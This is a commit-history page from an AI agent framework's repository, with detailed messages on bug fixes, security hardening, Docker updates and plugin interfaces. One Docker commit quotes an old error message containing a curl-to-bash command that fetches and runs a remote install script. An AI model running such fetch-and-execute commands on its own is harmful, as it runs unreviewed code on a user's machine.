teknium1	78be458608	fix(patch): widen new_string \t/\r unescape to all match strategies (#33733 ) Extends @liuhao1024's escape-normalized fix so the patch tool also recovers when old_string carries a real tab byte and matches via the `exact` strategy — which is the headline reproduction in the issue and the most common case in practice (LLMs frequently get old_string right because they re-read the file, but still serialize new_string's tabs as two-character `\t`). Instead of gating on the match strategy, decide per-sequence by looking at the matched region of the file: only convert `\t` -> tab and `\r` -> CR when the file region we're replacing actually contains the corresponding control byte. That mirrors the region-based heuristic in `_detect_escape_drift` and keeps legitimate writes of the literal two-character string `"\t"` (e.g. patching `sep = "\t"` in Python source) untouched — those files have a backslash+t in the matched region, not a real tab, so new_string passes through verbatim. `\n` is still excluded because newlines serialize correctly through JSON and unescaping would corrupt source escape sequences far more often than help. E2E verified against the live `patch` tool: tab-indented file + literal `\t` in new_string under both `exact` (Variant 1) and `escape_normalized` (Variant 2) strategies now produces real tab bytes; a Python source line containing `sep = "\t"` (legitimate literal backslash-t) survives a patch unchanged. Tests updated to cover both strategies and the legitimate-literal case, and to assert that `\n` is intentionally preserved. Refs #33733	2026-05-28 03:27:20 -07:00
liuhao1024	e9f3f2b34a	fix(tools): unescape common sequences in new_string when escape_normalized matches When the patch tool matches via the escape_normalized strategy, old_string contains literal \t, \n, \r sequences that get unescaped to match real control characters in the file. However, new_string was written as-is, leaving literal backslash sequences in the output. Add _unescape_common_sequences() helper and apply it to new_string when the matching strategy is escape_normalized. This ensures LLM-generated tab/newline sequences become real bytes in the patched file. Fixes #33733	2026-05-28 03:27:20 -07:00
Teknium	10ee4a729b	fix(gateway): drain on Windows `hermes gateway stop` so sessions survive restart (#33798 ) Sessions now survive `hermes gateway stop` / `restart` on native Windows. Previously the gateway died on schtasks `/End` + os.kill SIGTERM without ever running the drain loop, so the v0.13.0 session-resume feature (#21192) silently broke on Windows: `resume_pending=True` was never written, and the next boot started with a blank conversation history (issue #33778). Root cause is twofold and the reporter only identified half of it: 1. `hermes_cli/gateway_windows.py::stop()` did not write the `planned_stop_marker` before signalling. The reporter caught this. 2. The bigger reason: `asyncio.add_signal_handler` raises NotImplementedError for SIGTERM/SIGINT on Windows, so even if the marker had been written, the gateway's existing SIGTERM handler (which is what calls `runner.stop()` and the `mark_resume_pending` loop) was never invoked. Writing the marker would have been necessary-but-insufficient. The fix has two parts: * gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls for the planned-stop marker file every 0.5s. When the marker appears it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the same shutdown path a real SIGTERM would have driven, including the pre-drain `mark_resume_pending` writes (run.py:5977) and graceful drain wait. The existing signal handler already accepts `received_signal=None` and falls through to `consume_planned_stop_marker_for_self()`, so no handler changes needed. Runs on every platform as cheap belt-and-suspenders. * hermes_cli/gateway_windows.py: `stop()` now writes the marker for the running gateway PID and waits up to `agent.restart_drain_timeout` (default 30s) for the PID to exit cleanly. On clean drain, the kill sweep is non-forceful; on timeout, escalates to `kill_gateway_processes(force=True)` which routes to taskkill /T /F per `references/windows-native-support.md`. Validation: * 7 new tests in tests/gateway/test_planned_stop_watcher.py covering: marker→handler dispatch, no-marker idle, already-draining skip, not-yet-running skip, stop_event responsiveness, fire-once semantics, error tolerance. * 8 new tests in tests/hermes_cli/test_gateway_windows.py covering: marker-before-kill ordering, clean-drain skips force-kill, drain-timeout escalates to force=True, no-pid-skips-drain, invalid-pid handling, fast-exit success, timeout failure, marker-write-failure tolerance. * E2E (Linux, detached orphan): write_planned_stop_marker(pid) + `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the victim sees the marker and exits. Tested with a double-forked subprocess so the test parent isn't holding it as a zombie. * Targeted: tests/gateway/{restart_drain,restart_resume_pending, signal,signal_format,status,shutdown_forensics,approve_deny_commands, planned_stop_watcher} + tests/hermes_cli/{gateway_windows, gateway_service} → 519/519. What was wrong with the reporter's claim (for future archaeology): they described the symptom as "no `resume_pending=True` written to `sessions.json`" — but Hermes uses `state.db` (SQLite), not `sessions.json`, and `mark_resume_pending` is called regardless of the marker (the marker only affects exit code 0 vs 1 for systemd revival semantics). The real session-loss path is the missing drain on Windows, not a missing marker. Both halves are fixed here. Closes #33778.	2026-05-28 03:25:32 -07:00
Biser Perchinkov	b5495db701	fix(agent): re-pad reasoning_content on cross-provider fallback to require-side providers api_messages is built once before the retry loop while the primary provider is active. When a mid-conversation fallback switches to a require-side thinking provider (DeepSeek/Kimi/MiMo), assistant turns built under a non-require primary (e.g. Codex) go out without reasoning_content and the new provider rejects the request with HTTP 400 ("reasoning_content must be passed back"). Re-apply the echo-back pad against the current provider immediately before building the request kwargs. Idempotent and a no-op unless the active provider enforces echo-back, so it covers all fallback paths without affecting normal or reject-side operation. Drafted by Claude (Opus 4.7) under human review while fixing a personal deployment. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>	2026-05-28 03:21:00 -07:00
Indigo Karasu	9179396cb7	fix(stream-consumer): only set _final_content_delivered when final response confirmed delivered In GatewayStreamConsumer._run(), _final_content_delivered was set to True based on the success of a mid-stream finalize edit, before the final finalize edit was attempted. When the final edit later failed (Telegram flood control, retry-after), _final_response_sent stayed False but _final_content_delivered was already True, so gateway/run.py suppressed its normal final send and the user saw a partial / fallback message instead of the real answer. Changes in gateway/stream_consumer.py: - Remove the premature _final_content_delivered = True at the top of the got_done block. - Set _final_content_delivered = True only when the actual final send / edit succeeds, in each finalize branch (no-finalize adapter, _message_id finalize, no-_already_sent send). - _send_fallback_final: don't set _final_response_sent = True when only some chunks were delivered; the gateway should still attempt a complete final send. Set _final_content_delivered = True alongside _final_response_sent on the success path and short-text path. - Cancellation handler: set _final_content_delivered = True alongside _final_response_sent when the best-effort final edit succeeds. Adds TestFinalContentDeliveredGuard with 3 regression tests covering the core bug scenario, the happy path, and partial fallback. Closes #33708 Closes #25010 Refs #29200 Co-authored-by: Teknium <127238744+teknium1@users.noreply.github.com>	2026-05-28 03:15:19 -07:00
Dusk1e	a91b1c8b31	fix(tirith): reject non-regular tar members during auto-install process	2026-05-28 02:49:26 -07:00
teknium1	c7f7783e5c	test(xai-proxy): regression coverage for #28932 429 handling Three new tests in tests/hermes_cli/test_proxy.py: - xai_adapter_retry_rotates_pool_entry_on_429 — headline #28932 case. Two-entry pool, 429 on first entry, must rotate to second entry AND must NOT call refresh_xai_oauth_pure (refresh is irrelevant for rate limits). - xai_adapter_retry_returns_none_on_429_when_pool_exhausted — single-entry pool: 429 returns None so the rate-limit response flows back to the client unchanged (existing behavior preserved). - xai_adapter_retry_returns_none_for_unrelated_status — non-{401, 429} statuses must not trigger any retry path at all; guards against the gate becoming too broad in future changes. Each test asserts that refresh_xai_oauth_pure is never called on the 429 path — refresh is a 401-specific concern. 39/39 in tests/hermes_cli/test_proxy.py.	2026-05-28 02:36:37 -07:00
Dusk1e	aa3466063b	fix(android): reject unsafe tar members in psutil compatibility installer	2026-05-28 02:36:09 -07:00
teknium1	9b5dae17a5	feat(context-engine): host contract for external context engines Condenses the substance of PRs #16453, #17453, #16451, #17600, and #13373 into a minimal generic host contract that external context engine plugins (e.g. hermes-lcm) need to integrate cleanly. Drops scaffolding that duplicated existing infrastructure or had marginal value. Five concrete changes: 1. `_transition_context_engine_session()` on AIAgent — generic lifecycle helper that fires on_session_end → on_session_reset → on_session_start → optional carry_over_new_session_context. Engines implement only the hooks they need; missing hooks are skipped. Built-in compressor keeps its existing reset-only behavior because callers default to no metadata. `reset_session_state()` now optionally accepts previous_messages / old_session_id / carry_over_context and delegates to the transition helper when provided. (#16453) 2. `conversation_id` passed to `on_session_start()` — both the agent-init call site and the compression-boundary call site now forward `self._gateway_session_key` so plugin engines have a stable conversation identity that survives session_id rotation (compression splits, /new, resume). The key already existed on AIAgent; it just wasn't reaching engines. (#16453) 3. Canonical cache buckets forwarded to engines — the usage dict passed to `update_from_response()` now includes input_tokens, output_tokens, cache_read_tokens, cache_write_tokens, and reasoning_tokens on top of the legacy prompt/completion/total keys. Engines can make decisions on cache-hit ratios and reasoning costs instead of only aggregates. ABC docstring updated. (#17453) 4. Plugin-registered context engines visible in the picker — `_discover_context_engines()` in plugins_cmd.py now also includes engines registered via `ctx.register_context_engine()` from plugin manifests, deduplicating by name so repo-shipped descriptions win on collision. (#16451) 5. `_EngineCollector.register_command()` — context engines using the standard `register(ctx)` pattern can now expose slash commands (e.g. `/lcm`). Routes to the global plugin command registry with the same conflict-rejection policy regular plugins use (no shadowing built-ins, no clobbering other plugins). Previously these calls hit a no-op and the slash commands silently never appeared. (#17600) Dropped from the original 5 PRs: - Compression boundary signal (`boundary_reason="compression"`) from #16453 — already on main at `agent/conversation_compression.py:412-424`, landed via the bg-review extraction. - `discover_plugins()` before fallback in run_agent.py from #16451 — redundant: `get_plugin_context_engine()` already routes through `_ensure_plugins_discovered()` which is idempotent. - Runtime identity diagnostics method + helpers from #13373 (+251 LOC) — operators can already read engine state via `engine.get_status()`; the diagnostics view added marginal value relative to its surface area. - The 553-LOC slash-command machinery from #17600 — replaced with a 20-LOC `register_command` method on the collector that reuses the existing plugin command registry instead of building a parallel one. Net: ~215 LOC of host-contract changes + 282 LOC of focused tests, vs ~1,176 LOC across the original 5 PRs. Co-authored-by: Tosko4 <1294707+Tosko4@users.noreply.github.com> Closes #16453. Closes #17453. Closes #16451. Closes #17600. Closes #13373. Related: stephenschoettler/hermes-lcm#68.	2026-05-28 01:45:30 -07:00
Teknium	fb9f3a4ef9	fix(skills): pull full ClawHub catalog into the skills index (200 → 20k+) (#33748 ) * fix(skills): pull full ClawHub catalog into the skills index The website was showing 200 ClawHub skills out of 20k+ because `ClawHubSource.search("")` for empty queries went straight to a single unpaginated request. ClawHub's API caps any single page at 200 items and returns a `nextCursor`; we grabbed page 1 and stopped, so the cached index served from hermes-agent.nousresearch.com had a silent 99% truncation. End users never hit clawhub.ai directly (the index is rebuilt twice daily by .github/workflows/skills-index.yml and served as a static JSON on the docs site), so the cap-and-cache architecture is correct — it just wasn't being filled. Changes: - `ClawHubSource.search(query="")` now routes through the existing `_load_catalog_index()` paginating walker instead of the unpaginated listing fallback (non-empty queries still hit the fast catalog search). - `_load_catalog_index()` max_pages 50 → 250 (50k-skill ceiling; live catalog is ~20k as of May 2026, with headroom for growth). - `build_skills_index.py`: per-source crawl limits split out — ClawHub and LobeHub get 100k, others keep their effective caps. - `EXPECTED_FLOORS["clawhub"]` 50 → 5000 so the next pagination regression hard-fails the CI build instead of silently shipping a degenerate index. Test plan: - New unit test `test_search_empty_query_paginates_full_catalog` exercises the cursor-following path with three mocked pages (450 total items) and asserts all pages are walked. - Existing 9 ClawHub tests + 127 broader skills_hub tests all pass. - E2E against live ClawHub API: walker reached 9700+ skills across 49 pages before this commit landed, paginating well past the previous 50-page cap. * fix(skills): raise ClawHub ceilings — live catalog is 50k, not 20k E2E walk against live ClawHub API hit my initial 250-page cap at 49,698 skills with cursor=yes still pending. The catalog is roughly 2.5x larger than the docstring estimate. - max_pages 250 → 750 (150k ceiling, walks terminate on cursor=None well before this in practice) - SOURCE_LIMITS['clawhub'] 100k → 200k - EXPECTED_FLOORS['clawhub'] 5000 → 20000	2026-05-28 01:42:19 -07:00
Teknium	09a5cd8084	fix(auth): sync manual:device_code Codex pool entries on re-auth (#33744 ) #33164 made _save_codex_tokens sync the singleton-seeded `device_code` pool entry on Codex OAuth re-auth. That fixed the #33000 path but missed `manual:device_code` entries created by `hermes auth add openai-codex` (the recommended workaround for users who hit #33000 before #33164 landed). Every subsequent re-auth would refresh the device_code entry but leave the manual:device_code entry holding the consumed refresh token plus stale last_error_* markers — immediately recreating the 401 token_invalidated symptom on the next request, exactly as reported in #33538. Extend the refreshable source set to include `manual:device_code`. Completing the device-code OAuth flow proves the user owns the ChatGPT account, so it is safe to refresh every device-code-backed entry. Keep `manual:api_key` and other non-device-code manual sources untouched — those represent independent credentials. Closes #33538.	2026-05-28 01:33:10 -07:00
Dusk1e	43abc51f66	fix(security): require source CIDR allowlisting for public msgraph webhook binds	2026-05-28 01:26:18 -07:00
Teknium	87e5b2fae0	feat(mcp): support TLS client certificates (mTLS) for HTTP and SSE servers (#33721 ) Adds first-class `client_cert` / `client_key` config keys so MCP servers behind mTLS work without an external TLS-terminating proxy. Resolves inbound community question (Jeremy W.). Schema (per `mcp_servers.<name>`, HTTP/SSE only): - `client_cert: "/path/to/combined.pem"` — single PEM with cert + key - `client_cert: "/path/to/cert"` + `client_key: "/path/to/key"` — separate - `client_cert: [cert, key]` or `[cert, key, password]` — list form, with optional passphrase for encrypted keys Paths support `~` expansion. Missing files raise a server-scoped `FileNotFoundError` at connect time rather than failing later with an opaque TLS handshake error. Wiring: - New SDK HTTP path (mcp >= 1.24): `cert=` on the user-owned `httpx.AsyncClient` alongside the existing `verify=` handling. - SSE path: routed through an `httpx_client_factory` that wraps the SDK's defaults (follow_redirects=True) and layers `verify` + `cert` on top. The factory is only injected when needed, so the SDK's built-in `create_mcp_http_client` keeps being used in the default case. - Deprecated mcp<1.24 path left untouched — that SDK's `streamablehttp_client` signature doesn't expose `cert`, and adding it would be dead code. Also documents the previously-undocumented `ssl_verify` key (bool or CA bundle path) in the MCP config reference. Tests: - `tests/tools/test_mcp_client_cert.py` (new, 19 tests): - `_resolve_client_cert` helper: all three input forms, `~` expansion, missing-file and validation errors. - HTTP transport: `cert=` forwarded into `httpx.AsyncClient` for string and tuple forms; absent when unset; missing-file error propagates. - SSE transport: factory only injected when cert or non-default verify is set; factory applies cert, custom CA bundle, and preserves `follow_redirects=True` + forwarded headers/auth. - Existing tests: 200/200 in `test_mcp_tool.py` + `test_mcp_sse_transport.py` still pass.	2026-05-28 00:55:55 -07:00
Stephen Schoettler	8595281f3c	fix: expose context engine tools with saved toolsets	2026-05-28 00:28:42 -07:00
Dusk1e	1a9ef83147	fix(security): require API_SERVER_KEY before dispatching API server work	2026-05-28 00:25:08 -07:00
LeonSGP43	442a9203c0	Fix xAI OAuth timeout manual fallback	2026-05-28 00:24:17 -07:00
helix4u	459d7694d3	fix(agent): preload jiter native parser	2026-05-28 00:20:11 -07:00
Robin Fernandes	dc52b82d53	test(auth): update entitlement CI expectations	2026-05-28 00:19:31 -07:00
Robin Fernandes	1cf5e639b3	fix(auth): refresh Nous entitlement in tool menus	2026-05-28 00:19:31 -07:00
Robin Fernandes	406901b27d	feat(auth) normalise the way in which we check whether a user has free/paid access to nous portal so we can expose behaviour and error messages accordingly.	2026-05-28 00:19:31 -07:00
Squiddy	3ba8962738	fix(kanban): add Windows init lock guard	2026-05-27 23:28:51 -07:00
Squiddy	90b6b3d18f	fix(kanban): harden sqlite connection concurrency	2026-05-27 23:28:51 -07:00
Teknium	4e702fe2d9	test(ci): harden two flaky tests against CI noise (#33675 ) Some checks are pending Deploy Site / deploy-vercel (push) Waiting to run Details Deploy Site / deploy-docs (push) Waiting to run Details Docker / shell lint / Lint Dockerfile (hadolint) (push) Waiting to run Details Docker / shell lint / Lint docker/ shell scripts (shellcheck) (push) Waiting to run Details Docker Build and Publish / build-amd64 (push) Waiting to run Details Docker Build and Publish / build-arm64 (push) Waiting to run Details Docker Build and Publish / merge (push) Blocked by required conditions Details Lint (ruff + ty) / ruff + ty diff (push) Waiting to run Details Lint (ruff + ty) / ruff enforcement (blocking) (push) Waiting to run Details Lint (ruff + ty) / Windows footguns (blocking) (push) Waiting to run Details Nix / nix (macos-latest) (push) Waiting to run Details Nix / nix (ubuntu-latest) (push) Waiting to run Details OSV-Scanner / Scan lockfiles (push) Waiting to run Details Tests / test (1) (push) Waiting to run Details Tests / test (2) (push) Waiting to run Details Tests / test (3) (push) Waiting to run Details Tests / test (4) (push) Waiting to run Details Tests / test (5) (push) Waiting to run Details Tests / test (6) (push) Waiting to run Details Tests / save-durations (push) Blocked by required conditions Details Tests / e2e (push) Waiting to run Details uv.lock check / uv lock --check (push) Waiting to run Details Two unrelated transient failures on PR #33661's initial CI run, both pre-existing on main and recovered on rerun. Hardening: 1. tests/cron/test_scheduler.py::TestRunJobConfigLogging — added mocks for resolve_runtime_provider() and discover_mcp_tools(). The yaml-warning tests intend to exercise only the warning-log path, but _run_job_impl continues into provider resolution and MCP discovery after the warning. Both can spawn subprocesses / hit the network and pushed the test over its 30s budget under GHA load. 2. tests/tools/test_browser_supervisor.py — wrapped Chrome teardown against the stdlib subprocess._wait() race (bpo-38630). When SIGCHLD arrives during proc.wait(), _try_wait(WNOHANG) can return a foreign pid and the 'assert pid == self.pid or pid == 0' fires. Fixture now catches AssertionError/TimeoutExpired, force-kills, and always reaps so no zombie escapes. Same hardening applied to the early-skip branch.	2026-05-27 23:15:41 -07:00
Ben	875d930ac7	test(docker-update): stub subprocess.run in git-install regression guard The regression-guard test `test_cmd_update_on_git_install_does_not_print_docker_message` mocked `is_managed` and `detect_install_method` but not `subprocess.run`, so once `cmd_update(check=True)` decided this was a git install it shelled out to a real `git fetch upstream` / `git fetch origin`. On CI runners the worktree has no `upstream` remote configured and the fetch hung past the 30s pytest-timeout — test (4) slice failed in #33659 CI. Fix: stub `subprocess.run` with a successful CompletedProcess-shaped object whose stdout is `"0\n"`, so: - no real git command is ever invoked - the rev-list parsing later in the flow (`int(stdout.strip())`) succeeds rather than `ValueError`-ing through the test's SystemExit catch - the flow proceeds far enough to confirm the docker banner is absent (the actual assertion) Also broaden the except clause to `(SystemExit, Exception)`: the only assertion in this test is the negative-banner check on captured stdout; any further failure in the rest of the update flow is irrelevant to that contract. Verified locally: all 7 tests in `tests/hermes_cli/test_cmd_update_docker.py` pass in 0.39s (previously the regression-guard test alone consumed 30s+ and got SIGTERM'd).	2026-05-28 15:50:25 +10:00
Ben	b924b22a9d	fix(docker): `hermes update` prints `docker pull` guidance instead of bogus git error Inside the published Docker image, `hermes update` was hitting the ".git missing → reinstall via curl" fallback: ✗ Not a git repository. Please reinstall: curl -fsSL https://raw.githubusercontent.com/.../install.sh \| bash That message is wrong on two counts: 1. It tells the user to run the host-side installer, which would install a new Hermes on the host — not update the running container. 2. It doesn't mention `docker pull` at all, leaving Docker users to figure out the right action from scratch. `hermes update --check` was worse: it bailed with "Not a git repository — cannot check for updates." and nothing else. Fix: detect the Docker install method (already stamped by `docker/stage2-hook.sh` and surfaced by `detect_install_method()`) in both update entry points and print a long-form message that covers: - The right command: `docker pull nousresearch/hermes-agent:latest` - Restart guidance (`docker compose up -d --force-recreate` / re-run `docker run`) - How to verify the new version after restart - Tag-pinning caveat (`:latest` doesn't move a pinned tag) - Config persistence across upgrades (state under `HERMES_HOME` / `/opt/data` is bind-mounted and survives) - Fork escape hatch (build your own image with the repo's Dockerfile) Exit code is 1 (matches `managed_error` semantic for "tried to update but can't update this way"). Plumbing: - hermes_cli/config.py: new `format_docker_update_message()` helper sits next to the existing `_NIX_UPDATE_MSG` / `format_managed_message()` family so the wording lives in one place and both call sites (apply path + check path) consume it. - hermes_cli/main.py: * `cmd_update()`: bail right after the `is_managed()` gate, before any of the apply-path branches. * `_cmd_update_check()`: bail at the top of the function, before the existing `method == "pip"` branch. Neither path touches subprocess.run / git when method == "docker". Coverage: - 7 new tests in `tests/hermes_cli/test_cmd_update_docker.py`: * `hermes update` in Docker → message + exit 1, no git calls * `hermes update --check` (via cmd_update) → same * `--yes` / `--force` don't bypass (intentional) * `_cmd_update_check` called directly → bails too * git/pip installs still take their normal paths (regression guards) * `format_docker_update_message` content-lock test pinning the five user-actionable bits the message must contain - Existing test_cmd_update.py (21 tests) + test_managed_installs.py (5 tests) still pass — no regression on the source-install path. - Verified end-to-end in a real container: `docker run ... update` and `docker run ... update --check` both render the message and exit 1.	2026-05-28 15:50:25 +10:00
stephenschoettler	4a6f1863ac	test: cover ci-unblocker production regressions Snapshot review_agent._session_messages before teardown so close() can clean per-session state without dropping the user-visible self-improvement summary. Adds two regressions: - bg-review summarizer receives captured review-agent tool messages after review_agent.close() runs - context-compressor protected-head handoff rehydration populates _previous_summary and keeps the old handoff out of newly summarized turns Salvaged from PR #26039 onto current main after agent/background_review.py extraction. Original commit `63eaf6055`; bg-review test updated to patch the module-level summarize_background_review_actions in agent.background_review instead of the now-forwarder AIAgent._summarize_background_review_actions.	2026-05-27 22:14:53 -07:00
Ben	66489f38c7	fix(docker): bake build-time git SHA into the image `hermes dump` and the startup banner both call `git rev-parse HEAD` to report the running commit, but `.dockerignore` line 2 excludes `.git` — so inside the published image `hermes dump` shows `version: ... [(unknown)]` and the banner drops its `· upstream <sha>` suffix entirely. That makes support triage from container bug reports impossible: we can't tell which commit the user is actually running. Fix: thread the build-time SHA through as a Docker build-arg, write it to `/opt/hermes/.hermes_build_sha` in the image, and have a new `hermes_cli/build_info.get_build_sha()` read it as a fallback after the existing live-git lookup fails. Output format is unchanged in both callsites — same 8-char short SHA whether resolved live or baked. Wiring: - Dockerfile: `ARG HERMES_GIT_SHA=` + write-file step after the source copy. Empty/missing arg → no file written → callers fall through to live git (so local `docker build` without --build-arg is unchanged). - docker-publish.yml: passes `HERMES_GIT_SHA=${{ github.sha }}` on all four build-push-action steps (amd64/arm64, smoke-test + final push). - dump.py:_get_git_commit() / banner.py:get_git_banner_state(): try live git first, fall back to baked SHA, then to legacy `(unknown)` / None. Banner returns `upstream == local, ahead=0` because a built image is by definition pinned to one commit. Coverage: - Unit tests cover build_info (file present/absent/empty/error, truncation, whitespace), dump (live-git wins, both fallbacks, identical output-format regression guard), and banner (no-repo + baked, no-repo + no-sha, shallow-clone fallback). - tests/docker/test_dump_build_sha.py is an integration regression guard that runs against the real image, reads `/opt/hermes/.hermes_build_sha`, and asserts `hermes dump` surfaces its content (or stays at `(unknown)` if no file). - Verified end-to-end: `docker build --build-arg HERMES_GIT_SHA=abc...` → `docker run ... dump` reports `[abc12345]`; without the build-arg it reports `[(unknown)]` as before.	2026-05-28 15:14:05 +10:00
teknium1	ebe04c66cd	fix(kanban): close kanban.db FD after every connect() in long-lived processes `sqlite3.Connection.__exit__` commits/rollbacks but does NOT close the underlying FD. `with kb.connect() as conn:` in long-lived processes (gateway `run_slash`, dashboard `decompose_task_endpoint`) therefore leaks one FD to `kanban.db` per call. After enough operations the gateway dies with `[Errno 24] Too many open files` (~4 days uptime in the production report — #33159). Fix: add a `connect_closing()` context manager in `hermes_cli/kanban_db` that wraps `connect()` with a real `try/finally: conn.close()`. Switch the 42 leak-prone call sites in `hermes_cli/kanban.py` (35), `hermes_cli/kanban_decompose.py` (4), and `hermes_cli/kanban_specify.py` (3) over to it. `kanban.py` matters because `run_slash` (called from the gateway for every `/kanban` slash command) parses argparse and dispatches to those `_cmd_*` functions in-process — each one was leaking one FD per invocation. Tests inside `tests/` are untouched: short-lived processes where OS cleanup masks the leak. Regression tests added in `test_kanban_db.py` cover both happy-path and exception-path closure, plus an explicit assertion that bare `with kb.connect()` still does NOT close (documenting the upstream sqlite3 behaviour we're working around). Closes #33159.	2026-05-27 22:07:49 -07:00
Dusk	c341a2d107	fix(docker): align HOME for dashboard and s6 gateway services (#33481 )	2026-05-28 13:42:27 +10:00

1 2 3 4 5 ...

4488 commits